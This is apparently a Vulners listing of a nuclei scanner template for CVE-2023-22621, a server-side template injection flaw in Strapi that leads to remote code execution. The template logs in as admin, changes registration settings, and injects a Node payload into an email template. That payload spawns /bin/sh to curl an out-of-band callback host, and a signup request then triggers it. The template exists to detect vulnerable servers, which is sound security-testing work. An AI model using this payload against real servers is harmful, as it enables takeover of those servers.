Lucene search
K

Strapi Versions <=4.5.5 - SSTI to Remote Code Execution

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 77 Views

Strapi RCE via SSTI <=4.5.

Related
Refs
Code
id: CVE-2023-22621

info:
  name: Strapi Versions <=4.5.5 - SSTI to Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution.
  impact: |
    Authenticated attackers with admin panel access can inject malicious template code in email templates that bypasses validation checks, executing arbitrary system commands on the Strapi server and potentially compromising the entire CMS platform.
  remediation: |
    Update Strapi to version 4.5.6 or later that implements proper template validation and prevents code execution in email templates.
  reference:
    - https://github.com/strapi/strapi/releases
    - https://github.com/sofianeelhor/CVE-2023-22621-POC
    - https://github.com/strapi/security-patches
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22621
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-22621
    cwe-id: CWE-74
    epss-score: 0.76825
    epss-percentile: 0.99492
    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: strapi
    product: strapi
    shodan-query: html:"Welcome to your Strapi app"
  tags: cve,cve2023,strapi,ssti,rce,intrusive,authenticated,vuln,vkev

flow: http(1) && http(2) && http(3) && http(4)

variables:
  email: "{{email}}"
  password: "{{password}}"
  address: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        POST /admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{email}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "token","isActive")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: token
        json:
          - ".data.token"
        internal: true

  - raw:
      - |
        PUT /users-permissions/advanced HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

        {"unique_email":true,"allow_register":true,"email_confirmation":true,"email_reset_password":null,"email_confirmation_redirection":"{{RootURL}}","default_role":"authenticated"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "ok","true")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        PUT /users-permissions/email-templates HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{token}}
        Content-Type: application/json

        {
          "email-templates": {
            "reset_password": {
              "display": "Email.template.reset_password",
              "icon": "sync",
              "options": {
                "from": {
                  "name": "Administration Panel",
                  "email": "[email protected]"
                },
                "response_email": "",
                "object": "Reset password",
                "message": "<p>We heard that you lost your password. Sorry about that!</p>\n\n<p>But dont worry! You can use the following link to reset your password:</p>\n<p><%= URL %>?code=<%= TOKEN %></p>\n\n<p>Thanks.</p>"
              }
            },
            "email_confirmation": {
              "display": "Email.template.email_confirmation",
              "icon": "check-square",
              "options": {
                "from": {
                  "name": "Administration Panel",
                  "email": "[email protected]"
                },
                "response_email": "",
                "object": "Account confirmation",
                "message": "<%= `${ process.binding('spawn_sync').spawn({\"file\":\"/bin/sh\",\"args\":[\"/bin/sh\",\"-c\",\"curl {{interactsh-url}}\"],\"stdio\":[{\"readable\":1,\"writable\":1,\"type\":\"pipe\"},{\"readable\":1,\"writable\":1,\"type\":\"pipe\"/*<>%=*/}]}).output }` %>\n\n<p><%= URL %>?confirmation=<%= CODE %></p>\n\n<p>Thanks.</p>"
              }
            }
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "ok","true")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/auth/local/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "email": "{{address}}",
            "username": "{{randstr_1}}",
            "password": "{{randstr_2}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "ApplicationError"

      - type: word
        part: content_type
        words:
          - application/json
# digest: 4a0a004730450220296d27e98c9503c8f83aeebe083068d13a650cdc021eae8a7a04dcd58d82ffe9022100888db61679f230d59dc27c7af76750b1e74d1c7195bd72282913b4665e8a3305:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.17.2 - 10
EPSS0.76825
SSVC
77